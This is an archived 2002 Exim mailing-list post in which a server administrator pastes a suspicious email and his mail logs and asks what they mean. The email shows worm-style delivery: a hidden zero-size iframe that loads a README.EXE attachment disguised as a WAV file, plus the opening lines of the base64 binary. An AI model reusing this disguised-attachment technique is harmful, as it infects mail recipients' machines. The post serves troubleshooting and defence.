[Exim] a log entry and strange e-mail

Kezdőlap
Üzenet törlése
Válasz az üzenetre
Szerző: Jerry M Howell II
Dátum:  
Címzett: exim-users
Tárgy: [Exim] a log entry and strange e-mail
Hello all,

I'm trying to help my wife administrate a webserver that came with exim 3.36.
Today I checked my e-mail and got this strange e-mail. I am not extreamly familiar
with exim and might just be jumping to conclusions so if someone can explain what
this all meens and mabe point me to the area in the manual, or if someone has the
exim book by oreily I'd greatly apreciate it

------- e-mail source ----------------

Return-path: <jmhowell@???>
Envelope-to: jmhowell@???
Delivery-date: Tue, 10 Dec 2002 08:29:01 -0700
Received: from host217-39-71-148.in-addr.btopenworld.com ([217.39.71.148] helo=jmhowell.com)
    by gamma.hostbyk.com with smtp (Exim 3.36 #1)
    id 18LmJV-0004Yf-00
    for jmhowell@???; Tue, 10 Dec 2002 08:28:49 -0700
FROM: Liang <jmhowell@???>
DATE: Tue, 10 Dec 2002 15:32:10+0000
X-Mailer: EBT Reporter v 2.x
TO: jmhowell@???
subject: Netbirds
Mime-Version: 1.0
Content-Type: multipart/related;
    type="multipart/alternative";
    boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
Message-Id: <E18LmJV-0004Yf-00@???>


--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
    boundary="====_ABC1234567890DEF_===="


--====_ABC1234567890DEF_====
Content-Type: text/html;
    charset = "iso-8859-1"
Content-Transfer-Encoding: quoted-printable



<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe>Hello,<BR><BR>Product Name: Microsoft Windows 2000<BR>Product Id: 52273-005-6861993-09867<BR><BR>Process List: <BR>NtLmSsp NT LM Security Support Provider<BR>ProtectedStorage Protected Storage<BR>RsRavMon Rising Realtime Monitor Service<BR>SamSs Security Accounts Manager<BR>SMTPSVC Simple Mail Transport Protocol (SMTP)<BR>SysmonLog Performance Logs and Alerts<BR>NtLmSsp NT LM Security Support Provider<BR>ProtectedStorage Protected Storage<BR>RsRavMon Rising Realtime Monitor Service<BR>SamSs Security Accounts Manager<BR>SMTPSVC Simple Mail Transport Protocol (SMTP)<BR>SysmonLog Performance Logs and Alerts<BR><BR>Thank you.</BODY></HTML>
--====_ABC1234567890DEF_====--

--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
    Name = "README.EXE"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>


TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAyAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBy
dW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAADNwnnaiaMXiYmjF4mJoxeJCr8ZiYijF4ng

--------- rest of source cut because it's a looooooong binary ---------

my exim mainlog records show the folowing

[root@gamma jmhowell]# more /var/log/exim_mainlog | grep E18LmJV-0004Yf-00

[root@gamma jmhowell]# more /var/log/exim_mainlog | grep 217.39.71.148
2002-12-10 08:29:01 18LmJV-0004Yf-00 <= jmhowell@??? H=host217-39-71-148.in-addr.btopenworld.com (jmhowell.com) [217.39.71.148] P=smtp S=156938

[root@gamma jmhowell]# more /var/log/exim_mainlog | grep btopenworld.com
2002-12-08 20:37:24 18LEjT-000655-00 <= Flink652526@??? H=host217-37-59-133.in-addr.btopenworld.com (mx4.mail.yahoo.com) [217.37.59.133] P=smtp S=2136 id=18TL9E2TC05M4.5U8H2AR1KBJE.Flink652526@???
2002-12-09 04:05:27 18LLiv-0006xw-00 rejected from host217-34-213-4.in-addr.btopenworld.com (205.214.80.64) [217.34.213.4]: cannot route to sender <cust_service@???>
2002-12-10 08:29:01 18LmJV-0004Yf-00 <= jmhowell@??? H=host217-39-71-148.in-addr.btopenworld.com (jmhowell.com) [217.39.71.148] P=smtp S=15693

--
Jerry M. Howell II